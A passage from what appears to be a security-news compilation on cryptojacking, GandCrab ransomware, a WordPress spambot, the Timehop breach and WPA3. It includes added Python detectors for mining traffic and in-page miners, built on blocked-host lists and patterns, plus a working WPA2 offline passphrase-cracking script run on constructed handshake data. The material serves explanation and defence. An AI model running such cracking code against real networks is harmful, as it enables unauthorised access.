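    login: Optional[str]   # wallet/worker name, useful for incident scoping


def inspect_payload(payload: bytes) -> List[StratumHit]:
    """Scan one plaintext TCP payload for Stratum subscription/login messages.

    Stratum is newline-delimited JSON-RPC, so each line is parsed on its own.
    A message is flagged only when it has the id/method/params triple AND
    its method is a known pool-protocol verb, so an unrelated JSON-RPC call
    such as {"method": "getStatus"} is not flagged.
    """
    hits: List[StratumHit] = []
    for raw in payload.split(b"\n"):
        raw = raw.strip()
        if not raw.startswith(b"{"):
            continue  # HTTP, TLS records or binary: not a JSON-RPC line
        try:
            msg = json.loads(raw.decode("utf-8"))
        except (UnicodeDecodeError, json.JSONDecodeError):
            continue
        if not isinstance(msg, dict) or not {"id", "method", "params"}.issubset(msg):
            continue
        method = msg["method"]
        if method not in STRATUM_METHODS:
            continue
        params = msg["params"]
        agent = login = None
        if isinstance(params, dict):                 # XMRig-style "login"
            agent = params.get("agent")
            login = params.get("login")
        elif isinstance(params, list) and params:    # classic mining.subscribe
            agent = params[0] if isinstance(params[0], str) else None
        hits.append(StratumHit(method, msg["id"], agent, login))
    return hits


def classify(payload: bytes) -> str:
    """Verdict string a DPI rule would act on: "allow" or "block: <details>"."""
    hits = inspect_payload(payload)
    if not hits:
        return "allow"
    return "block: " + ", ".join(f"{h.method} agent={h.agent}" for h in hits)


# Constructed sample payloads (not captured traffic).
XMRIG_LOGIN = (b'{"id":1,"jsonrpc":"2.0","method":"login","params":'
               b'{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/2.6.2"}}\n')
CLASSIC_SUBSCRIBE = (b'{"id": 1, "method": "mining.subscribe", '
                     b'"params": ["cpuminer/2.5.0"]}\n')
BENIGN_RPC = b'{"id": 7, "method": "getStatus", "params": []}\n'
HTTP_GET = b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"

if __name__ == "__main__":
    for sample in (XMRIG_LOGIN, CLASSIC_SUBSCRIBE, BENIGN_RPC, HTTP_GET):
        print(classify(sample))
```

This only covers Stratum in the clear; the same messages inside TLS need the pool-address blacklisting discussed next.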

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.
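To make the naming-convention and known-host strategies above concrete, here is an added Python scanner (not part of the FireEye report) that pulls script references out of a fetched page and flags the indicators in the list: scripts loaded from known mining-project hosts, miner-style script file names, the Coinhive API constructor in inline code, and WebSocket pool or proxy URLs. The host set, the name pattern and the sample HTML are constructed assumptions, and the site key is a placeholder.

```python
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

# Hosts of known mining projects to block outright (constructed starting
# point; maintain this from your own threat intel, not as an authority).
MINER_HOSTS = {"coinhive.com", "authedmine.com"}
# File-name conventions seen in the wild, e.g. coinhive.min.js, authedmine.min.js
MINER_SCRIPT_NAMES = re.compile(
    r"(coinhive|authedmine|cryptoloot|deepminer)[^/]*\.js$", re.I)
# Inline indicators: the Coinhive JS API and WebSocket pool/proxy endpoints
# (wss:// is a weak signal on its own; review before blocking).
INLINE_PATTERNS = {
    "coinhive_api": re.compile(r"\bCoinHive\.(Anonymous|User|Token)\b"),
    "wss_pool_url": re.compile(r"wss://[^\s'\"]+", re.I),
}


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []
        self.inline: List[str] = []
        self._in_script = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_html(html: str) -> List[Tuple[str, str]]:
    """Return (rule, evidence) findings; an empty list means nothing matched."""
    parser = ScriptCollector()
    parser.feed(html)
    findings: List[Tuple[str, str]] = []
    for src in parser.srcs:
        parsed = urlparse(src)
        host = (parsed.hostname or "").lower()
        if host in MINER_HOSTS or any(host.endswith("." + h) for h in MINER_HOSTS):
            findings.append(("external_script_blocked_host", src))
        elif MINER_SCRIPT_NAMES.search(parsed.path):
            findings.append(("external_script_naming", src))
    for body in parser.inline:
        for rule, pattern in INLINE_PATTERNS.items():
            match = pattern.search(body)
            if match:
                findings.append((rule, match.group(0)))
    return findings


# Constructed sample page: one legitimate library plus four miner indicators.
SAMPLE_HTML = """<html><head>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script src="https://cdn.example.invalid/assets/authedmine.min.js"></script>
</head><body>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.2});
  miner.start();
</script>
<script>
  var ws = new WebSocket('wss://ws.example.invalid:8443/proxy');
</script>
</body></html>"""

if __name__ == "__main__":
    for rule, evidence in scan_html(SAMPLE_HTML):
        print(f"{rule}: {evidence}")
```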

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

A few days after discovery of GandCrab ransomware ver 4.0, experts found 4.1 version

Security experts from Fortinet recently detected a new version of the GandCrab ransomware, ver 4.1, that is being distributed through compromised websites.

A few days ago, I wrote about the return of the GandCrab ransomware (v4): a new version appeared in the threat landscape, and experts at BleepingComputer first reported it.

GandCrab ransomware is a young threat: it first appeared in the wild early this year, but it rapidly evolved as its authors improved it over the following months. As of March, the ransomware had infected over 50,000 systems and netted its operators over $600,000 in ransom payments.

Security experts from Fortinet recently detected a new version of the threat, the GandCrab ransomware 4.1 that is being distributed through compromised websites designed to appear like download sites for cracked applications.

Like GandCrab ransomware version 4, the new variant uses the Salsa20 stream cipher to encrypt data instead of the RSA-2048 encryption that was used in early versions of the threat.

The code of the latest variant, 4.1, includes a list of websites to which the malware connects to send data about the infected machine (i.e. IP address, username, computer name, network domain, and, if present, a list of anti-malware tools on the system).

“Only two days after the release of GandCrab 4.0, FortiGuard Labs found a newer version (v4.1) being distributed using the same method, which is through compromised websites disguised as download sites for cracked applications.” reads the analysis published by Fortinet.

“With this new version, GandCrab has added a network communication tactic that was not observed in the previous version.”


Why does the new variant send data to a large number of websites?

According to Fortinet, there is no evidence that the websites in the hard-coded list have actually been compromised, which suggests the malware authors are either testing the functionality or have put it there as a diversionary tactic.

“However, we found no definitive evidence that the hard-coded websites included in the malware had actually ever been compromised to act as servers or download sites for GandCrab.” continues the analysis.

“Even more curious, the fact is that sending victim information to all live hosts in the list is illogical in a practical sense, given that a single successful send would have been enough for its purposes. With these points in mind, we have started to think that this function is either experimental, or simply there to divert analysis and that the URLs included in the list are just victims of a bad humour.”

The analysis of the ransomware revealed that the GandCrab ransomware 4.1 kills numerous processes that can interfere with the file encryption process. For example, it kills msftesql.exe, sqlagent.exe, oracle.exe, msaccess.exe, powerpnt.exe, and wordpad.exe to encrypt high-value files used by most popular applications, such as Microsoft Office Files, Steam, Oracle, etc.

The experts from Fortinet highlighted that there is no evidence that the GandCrab ransomware 4.1 is also able to spread via SMB shares, as WannaCry and Petya/NotPetya did.

“Over the past few days, numerous reports have been circulating claiming that this version of the GandCrab malware can self-propagate via an “SMB exploit”” continues the analysis.


“However, in spite of this string, we could not find any actual function that resembles the reported exploit capability. (It may also be relevant to report that this string was actually first found in v4.0 and not in v4.1, at least in the samples that we have analysed.) Since this string is not connected to any actual exploit spreading function that we could uncover, it seems much more likely that it is simply referring to the encryption of network shares, and not for any sort of exploit propagation.”

In summary, the threat continues to evolve, but it cannot yet spread via SMB shares.

Pierluigi Paganini

(Security Affairs – gandcrab ransomware 4.1, cybercrime)

The post A few days after discovery of GandCrab ransomware ver 4.0, experts found 4.1 version appeared first on Security Affairs.

Spambot targets WordPress sites in World Cup-themed spam scam

Imperva observed a spambot targeting WordPress sites, aimed at tricking victims into clicking on links to sites offering betting services on the FIFA World Cup.

Security experts from Imperva recently observed a spike in spam activity directed at WordPress websites; the attackers aimed at tricking victims into clicking on links to sites offering betting services on the 2018 FIFA World Cup games.

Imperva monitored the activity of a botnet used to spread meaningless text messages generated from a template to comments sections in blogs, news articles, and other web sites that allow people to comment.

“Turns out the attack was launched by a botnet and implemented in the form of comment SPAM – meaningless, generic text generated from a template and posted in the comment sections of blogs, news articles etc; linking to pay-per-click commercial or suspicious sites looking to scam you or phish for your passwords.” reads the report published Imperva.

The spambot was used to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately, without regard for whether the site has a comments section or is affected by known exploitable issues.

The comments are generated from a template that has been known since at least 2013. The template automatically produces slightly different versions of the same message for use in spam campaigns.

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites. Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.” continues Imperva.


“We found that the botnet advertised over 1000 unique URLs, most of them appear multiple times. In many cases, the botnet used different techniques such as URL redirection and URL-shortening services to mask the true destination of the advertised link.”

According to the experts, the spambot is still small: it is composed of just 1,200 unique IPs, with up to 700 unique IPs active daily. The experts discovered that the botnet has also been using URL-shortening, URL redirection, and other techniques to mask the landing sites of the links advertised in its spam messages.

In the weeks before the World Cup, the spambot was being used in remote code execution attacks and other non-spam attacks on WordPress sites.


Just after the beginning of the 2018 World Cup, the botnet activity was focused on comment spam, a circumstance that suggests the malicious infrastructure is available for hire.

“A possible explanation is that the botnet is for hire. The malicious activity we’ve seen at first was either paid for or simply the botnet’s attempt to grow itself. Then, it was hired by these betting sites to advertise them and increase their SEO.” continues the analysis.

Comment spam is a well-known activity in the threat landscape; the most common countermeasure is to blacklist the IPs originating the spam messages as well as the URLs they advertise.

WordPress also has several plug-ins that can counter this nuisance.

“Although comment SPAM has been with us for more than a decade — and doesn’t seem like it’s going away anytime soon — there are numerous solutions ranging from dedicated plugins that block comments that look SPAMmy, to WAF services.” concluded Imperva.

Pierluigi Paganini

(Security Affairs – spambot, World Cup spam)

The post Spambot targets WordPress sites in World Cup-themed spam scam appeared first on Security Affairs.

What is the Tor Browser? How it works and how it can help you protect your identity online

Move over “dark web,” the Tor Browser will keep you safe from snoops. The Tor Browser is a web browser that anonymizes your web traffic using the Tor network, making it

The post What is the Tor Browser? How it works and how it can help you protect your identity online appeared first on The Cyber Security Place.

Timehop provides additional details on the recent security breach

Timehop recently announced that it suffered a data breach affecting 21 million user accounts. The company now shares additional details about the incident.

The Timehop service aims to help people find new ways to connect with each other by analyzing past activities. Earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users.

The security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. The tokens have been quickly revoked and currently don’t work.

On Wednesday the company provided an update on the incident, adding that further information was exposed, including dates of birth, genders, and country codes.


“Earlier reports of “up to 21 million emails” were correct. However we now provide the following breakdown of Personally Identifiable Information (PII) that was breached, and the combinations contained in records” reads the update provided by the company.

Type of personal data combination   # of breached records   # of breached GDPR records
Name, email, phone, DOB             3.3 million             174,000
Name, email address, phone          3.4 million             181,000
Name, email address, DOB            13.6 million            2.2 million
Name, phone number, DOB             3.6 million             189,000
Name and email address              18.6 million            2.9 million
Name and phone number               3.7 million             198,000
Name and DOB                        14.8 million            2.5 million
Name total                          20.4 million            3.8 million
DOB total                           15.5 million            2.6 million
Email addresses total               18.6 million            2.9 million
Gender designation total            9.2 million             2.6 million
Phone numbers total                 4.9 million             243,000

The company broke out separately the records belonging to EU users, which fall under the GDPR that came into force in May 2018.

According to the company, the attacker first got into its systems on December 19, 2017, using an employee's credentials for the company's cloud computing environment.

The attackers accessed the systems through an IP address in the Netherlands.

In a first phase the attacker only conducted reconnaissance; at that time the compromised environment held no personal information. In early April the company moved personal information into the compromised database, and the attacker discovered it on June 22.

On July 4 the attacker exfiltrated the data and changed the database password. The company became aware of the activity within about 24 hours.

“They did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” reads the technical analysis published by Timehop. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”
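The engineer's decision to wait until the next day was a judgement about who was likely to be in the office; an alerting rule can instead score the password change against the principal's own history. The Python below is an added example written for this page, not Timehop's code: it runs two rules over constructed audit-log lines whose field names (ts, user, action, src_ip, country), action names and holiday calendar are assumptions modelled on cloud API logs. A console login from a country the user has never logged in from is flagged and its source IP remembered; a later credential change from a flagged source, or on a holiday, weekend or outside business hours, is raised regardless of who else might plausibly have made it.

```python
import json
from datetime import datetime

# Constructed cloud audit-log events, one JSON object per line. These are NOT
# Timehop's logs; the field names and action names are assumptions for this
# example, and the dates only mirror the incident timeline described above.
SAMPLE_LOG = """
{"ts": "2017-12-12T10:15:00Z", "user": "eng-alice", "action": "ConsoleLogin", "src_ip": "203.0.113.10", "country": "US"}
{"ts": "2017-12-19T03:41:00Z", "user": "eng-alice", "action": "ConsoleLogin", "src_ip": "198.51.100.7", "country": "NL"}
{"ts": "2017-12-19T03:50:00Z", "user": "eng-alice", "action": "DescribeDBInstances", "src_ip": "198.51.100.7", "country": "NL"}
{"ts": "2018-07-04T14:04:00Z", "user": "eng-alice", "action": "ModifyDBInstance:MasterUserPassword", "src_ip": "198.51.100.7", "country": "NL"}
{"ts": "2018-07-05T09:30:00Z", "user": "eng-bob", "action": "ConsoleLogin", "src_ip": "203.0.113.11", "country": "US"}
"""

# Actions that change credentials and deserve a human look whoever seems to
# have done them (assumed names, modelled on cloud API verbs).
SENSITIVE_ACTIONS = {
    "ModifyDBInstance:MasterUserPassword",
    "UpdateLoginProfile",
    "CreateAccessKey",
}
HOLIDAYS = {"2018-07-04"}       # constructed holiday calendar
BUSINESS_HOURS = range(9, 18)   # UTC, for simplicity


def parse_events(text):
    """Yield one dict per non-empty log line."""
    for line in text.splitlines():
        if line.strip():
            yield json.loads(line)


def outside_business_time(ts_iso):
    """True on a listed holiday, at the weekend, or outside 09:00-18:00."""
    ts = datetime.fromisoformat(ts_iso.replace("Z", "+00:00"))
    return (ts.date().isoformat() in HOLIDAYS
            or ts.weekday() >= 5
            or ts.hour not in BUSINESS_HOURS)


def detect(events):
    """Return alerts for new-geography logins and for sensitive actions that
    come from a previously flagged source or at an unusual time."""
    seen_countries = {}   # user -> countries already used to log in
    flagged_ips = set()   # sources that produced a new-country login
    alerts = []
    for e in events:
        user, ip, country = e["user"], e["src_ip"], e["country"]
        known = seen_countries.setdefault(user, set())
        if e["action"] == "ConsoleLogin":
            # The first login ever is the baseline; a later login from a
            # country this user has never used is the signal.
            if known and country not in known:
                alerts.append({"rule": "new_country_login", "ts": e["ts"],
                               "user": user, "src_ip": ip, "country": country})
                flagged_ips.add(ip)
            known.add(country)
        if e["action"] in SENSITIVE_ACTIONS:
            reasons = []
            if ip in flagged_ips:
                reasons.append("source IP previously flagged")
            if outside_business_time(e["ts"]):
                reasons.append("holiday, weekend or outside business hours")
            if reasons:
                alerts.append({"rule": "sensitive_action", "ts": e["ts"],
                               "user": user, "action": e["action"],
                               "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(alert)
```

Run against the sample, the December login from the Netherlands is raised as a new-country login, and the July 4 password change is raised twice over: it comes from that remembered source and it lands on a holiday. Neither reason depends on guessing whether a colleague was doing maintenance.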

Pierluigi Paganini

(Security Affairs – Timehophacking)

The post Timehop provides additional details on the recent security breach appeared first on Security Affairs.

Security newsround: July 2018

We round up reporting and research from across the web about the latest security news and developments. This month: stress test for infosec leaders, cybercrime by the numbers, financial fine for enabling cyber fraud, third party risk leads to Ticketmaster breach, Privacy Shield in jeopardy, and a win for Wi-Fi as security improves.

Under pressure: stress levels rise for security professionals

Tense, nervous headache? You might be working in information security. A global survey of 1,600 infosec leaders has found that the role is under more stress than ever. Rising malware threats, a shortage of skilled people, and budget constraints are producing a perfect storm of pressure on professionals. The findings come from Trustwave’s 2018 Security Pressures Report. It found that the trend of increasing stress has been edging steadily upwards since its first report five years ago.

Some 54 per cent of respondents experienced more pressure to secure their organisation in 2017 compared to the previous year. More than half (55 per cent) also expect 2018 to bring more pressure than 2017 did. Dark Reading quoted Chris Schueler of Trustwave saying the pressure to perform will push security leaders to improve performance or burn out. SecurityIntelligence led with the angle that the biggest obligation facing security professionals is preventing malware. Help Net Security has a thorough summary of the findings.

There was some good news: fewer professionals reported feeling pressure to buy the latest security tech compared to past years. The full report is available to download here.

CEO fraud scam hits companies hard

CEO fraud, AKA business email compromise, was the internet crime most commonly reported to the FBI during 2017. Victims lost a combined amount of more than $676 million last year, up almost 88 per cent compared to 2016. Total reported cybercrime losses came to $1.42 billion last year. The data comes from the FBI’s 2017 Internet Crime Report, which it compiles from public complaints to the agency. (No vendor surveys or hype here.)

The next most prominent scams were ransomware, tech support fraud, and extortion, the FBI said. Corporate data breaches rose slightly in number year on year (3,785 in 2017, up from 3,403 in 2016) but the financial hit decreased noticeably ($60.9 million in 2017 vs $95.9 million in 2016). There were broadly similar numbers of fake tech support scams between 2017 and 2016, but criminals almost doubled their money. The trends in the report could help security professionals to evaluate potential risks to their own organisation and staff.

Asset manager’s lax oversight opens door to fraud and a fine

Interesting reading for security and risk professionals in the Central Bank of Ireland’s highly detailed account of a cyber fraud. Governance failings at Appian Asset Management led to it losing €650,000 in client funds to online fraud. Although Appian subsequently replaced the funds in the client’s account, the regulator fined the firm €443,000. A CBI investigation uncovered “significant regulatory breaches and failures” at the firm, which exposed it to the fraud. It’s the first time the Irish regulator has imposed such a sanction for cyber fraud.

The fraud took place over a two-month period, starting in April 2015. The CBI said a fraudster hacked the real client’s webmail account to impersonate them during email correspondence with an Appian employee. The fraudster also used a spoofing technique to mimic that employee’s email address. The criminal intercepted messages from the genuine client and sent replies from the fake employee email to hide traces of the scam.

The press release runs to more than 3,200 words, and also goes into great detail about the gaps in policy and risk management at Appian.

Tales from the script: third-party app flaw leads to Ticketmaster data breach

As growing numbers of websites rely on third-party scripts, it’s vital to check they don’t put sites’ security at risk. That’s one of the lessons from the data breach at Ticketmaster UK. The company discovered malicious code running on its website that was introduced via a customer chat feature. This exposed sensitive data, including payment details, of around 40,000 customers. Anyone who bought a ticket on its site between September 2017 and June 2018 could be at risk, Ticketmaster warned.

On discovering the breach, Ticketmaster disabled the code across all its sites. The company contacted all affected customers, recommending they change their passwords. It published a clearly worded statement to answer consumer questions, and offered free 12-month identity monitoring.

Although this first seemed like good crisis management and proactive breach notification, the story didn’t end there. Inbenta Technologies, which developed the chat feature, weighed in with a statement shifting some blame back towards Ticketmaster. The vulnerability came from a single piece of custom JavaScript code Inbenta had written for Ticketmaster. “Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customised script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability,” Inbenta CEO Jordi Torras said.

Then Monzo, a UK bank, blogged in detail about the steps it took to protect its customers from the fallout. This included the bombshell that Ticketmaster knew about the breach in April, although the news only went public in June. Wired said these developments showed the need to thoroughly investigate potential breaches, and to remember subcontractors when assessing security risks.

Privacy Shield threat puts EU-US data sharing in doubt

US authorities have two months to start complying with Privacy Shield or else MEPs have threatened to suspend it. The EU-US data sharing framework replaced the Safe Harbor framework two years ago. Privacy Shield was supposed to extend the same rights for protecting EU citizens’ data as they have in Europe. In light of the Facebook-Cambridge Analytica scandal (both of which were certified under Privacy Shield), it seems that’s no longer the case.

MEPs consider privacy and data protection as “fundamental rights … that cannot be ‘balanced’ against commercial or political interests”. They voted 303 to 223 in favour of suspending the Privacy Shield agreement unless the US complies with it.

This could have implications for any organisation that uses a cloud service provider in the US. If they are using Privacy Shield as an adequacy decision for that agreement, they may no longer be GDPR-compliant after 1 September. Expect more developments on this over the coming months.

Welcome boost for Wi-Fi security

The Wi-Fi Alliance’s new WPA3 standard promises enhanced security for business and personal wireless networks. WPA3-Personal replaces the WPA2 pre-shared-key handshake with a key establishment protocol called Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange in which a passively captured handshake gives an attacker nothing to test password guesses against; offline dictionary attacks therefore no longer work, and each guess costs a live exchange with the network. Announcing the standard, the Wi-Fi Alliance said the enterprise version offers “the equivalent of 192-bit cryptographic strength, providing additional protections for networks transmitting sensitive data, such as government or finance”. Hardware manufacturers including Cisco, Aruba, Broadcom and Aerohive all backed the standard.

Tripwire said WPA3 looks set to improve security for open networks, such as guest or customer networks in coffee shops, airports and hotels. The standard should also prevent passive nearby attackers from being able to monitor communication in the air. The Register said security experts have welcomed the upgrade. It quoted Professor Alan Woodward, a computer scientist at the University of Surrey in England. The new form of authentication, combined with extra strength from longer keys, is “a significant step forward”, he said.
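To see what SAE removes, it helps to see the WPA2-Personal attack it is designed to defeat. The Python below is an added example and not code from the Wi-Fi Alliance or any vendor named above: it reproduces the WPA2 key derivation (PBKDF2 from passphrase and SSID, PRF-384 to the PTK, HMAC-SHA1-128 over the EAPOL-Key frame) on constructed handshake material, produces the "captured" MIC from an assumed passphrase, and then recovers that passphrase from a small wordlist without ever talking to the network.

```python
import hashlib
import hmac

# Constructed WPA2-Personal handshake material. Nothing here is a real capture:
# the SSID, MACs, nonces and EAPOL bytes were chosen for this example, and the
# "captured" MIC is produced below from an assumed passphrase.
SSID = b"example-net"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(0x10, 0x30))        # 32-byte AP nonce
SNONCE = bytes(range(0x40, 0x60))        # 32-byte station nonce
# Stand-in for the second EAPOL-Key frame with its 16-byte MIC field zeroed;
# a real attacker takes these bytes straight from the sniffed frame.
EAPOL_FRAME = (bytes.fromhex("0103007502010a00") + bytes(8) + SNONCE
               + bytes(16 + 8 + 8) + bytes(16) + bytes(2))


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits).
    The only secret input is the passphrase; the SSID is broadcast."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i), concatenated."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces));
    the first 128 bits are the KCK that authenticates the handshake frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck, frame):
    """WPA2/CCMP: HMAC-SHA1-128 over the EAPOL-Key frame with the MIC field zeroed."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def crack(captured_mic, wordlist):
    """Test each guess offline: every input except the passphrase is public."""
    for guess in wordlist:
        kck = derive_kck(pmk_from_passphrase(guess, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(kck, EAPOL_FRAME), captured_mic):
            return guess
    return None


# The network's passphrase is assumed for the demo; CAPTURED_MIC stands in for
# the value an attacker would read out of a sniffed handshake.
REAL_PASSPHRASE = "correct horse battery"
CAPTURED_MIC = eapol_mic(
    derive_kck(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE),
    EAPOL_FRAME)
WORDLIST = ["password", "letmein", "example-net", "correct horse battery", "hunter2"]

if __name__ == "__main__":
    print("recovered:", crack(CAPTURED_MIC, WORDLIST))
```

Every input to the MIC other than the passphrase is public, which is why a single captured four-way handshake supports unlimited offline guesses at whatever rate the attacker's hardware allows. In SAE both sides first map the password to a group element and then run a Diffie-Hellman style exchange with fresh random values; the frames carry commitments and a confirm value keyed on the resulting shared secret, so a passive capture gives a guess nothing to be checked against, and each guess costs a live exchange that the access point can throttle.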


The post Security newsround: July 2018 appeared first on BH Consulting.

“You have all these silver bullets but not every threat is a werewolf”

Attendees at FutureScope got an insight into how cybersecurity threats have evolved from a technical concern to a business risk. Last week’s business networking conference in Dublin promised perspectives on emerging technologies – including how security affects our increasingly connected world.

BH Consulting founder Brian Honan spoke as part of a panel discussion with Damon Rands, CEO of Wolfberry CS. MC Karlin Lillington, technology columnist with the Irish Times, started by asking: “Are we overly worried or underprepared? Hyped into panic or not taking this seriously enough?”

Brian Honan said: “I think we’re living in an era where we’re reaping the seeds sown over the last few decades.” That partly stems from governments not grasping issues like protecting critical infrastructure, or businesses rapidly releasing products without considering security.

Hype vs hygiene: figuring out security priorities

Hype from security product makers has also played a part, Brian added. “It’s a perfect storm. Any time there’s a new vulnerability announced, it comes with its own website and its own PR campaign. We saw that with Shellshock and Heartbleed, yet in reality, none of our clients were attacked.” Referring to security vendors’ tendency to oversell their products’ capabilities, he said: “You have all these silver bullets, but not every security threat is a werewolf.”

It’s far more common to see organisations with poor security hygiene, where patches are not applied regularly or systems are not protected properly, Brian said. “For large organisations and most businesses, the risks you face are the standard threats. They include users clicking on links, poor passwords and unpatched systems. When we run security exercises against our clients, the first thing we target is not the IT infrastructure, it’s the people,” said Brian.

Damon Rands agreed. “90% of our work is reconfiguring what [systems] you’ve got already,” he said. At the same time, there are very real threats businesses need to protect against, he added.

Understanding cybersecurity threat types

Those threats vary by the type of businesses, said Brian. “If you’re a small business, the risk is of automated attacks like ransomware or computer viruses; kids and criminals looking for insecure systems. That’s at the base level. As you go up to large organisations with large amounts of data or intellectual property, you become a more targeted threat.”

Addressing the audience, Brian said most businesses shouldn’t think they face the same cybersecurity threats as nation states. “Not everybody in this room is a target for the NSA or GRU,” he said.

Damon Rands said Cyber Essentials is a framework of security controls that can help businesses to check for common risks. However, he pointed out that Cyber Essentials only focuses on technical security controls, not user behaviour and awareness. Growing numbers of businesses have adopted it recently and Rands said: “I believe that’s due to GDPR.”

Another evolution in cybersecurity predates GDPR, Brian added. When he founded BH Consulting in 2004, most of the people he spoke to were in technical roles. “Nowadays, we are being brought in by boards, audit committees and the C-suite who see security as a business risk,” he said.

This prompted Karlin Lillington to ask about how to pitch a technical security message to such a different audience. Brian said: “You have to treat it as another business risk. Very few businesses in the world would be efficient if they didn’t have their IT.”

The post “You have all these silver bullets but not every threat is a werewolf” appeared first on BH Consulting.

Cyber Security Roundup for February 2018

February saw more than 5,000 websites infected with cryptocurrency-mining code after a popular accessibility plugin, 'BrowseAloud', was compromised by hackers. Several UK government and council websites went offline as a result, including those of the Information Commissioner's Office, the Student Loans Company, and Manchester City, Camden and Croydon councils. Symantec researchers also announced that 'cryptojacking' attacks had increased 1,200% in the UK. Cryptojacking once meant installing cryptocurrency-mining malware on users' computers; it is now more often done in the browser, by compromising a website so that it serves a malicious mining script that executes as the user visits the site, as in the BrowseAloud incident.

More than 25% of UK councils are said to have suffered a breach in the last five years, according to the privacy group Big Brother Watch, which said UK councils are unprepared for cyber attacks.

A fascinating report on the malicious use of artificial intelligence (AI), written by 26 leading AI experts, forecasts the various malicious uses of AI, including in cybercrime and in manipulating social media and national news agendas.
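The BrowseAloud compromise and the Ticketmaster breach described earlier on this page are the same failure: a third-party script included on a sensitive page was changed upstream, and every visitor ran the new version. The Python below is an added example, not code from either company or vendor: it audits a constructed checkout page (example hostnames, not the real sites) for third-party scripts that the browser cannot pin with a subresource integrity (SRI) attribute, and shows how the integrity value is computed from a reviewed copy of the script and checked at load time.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

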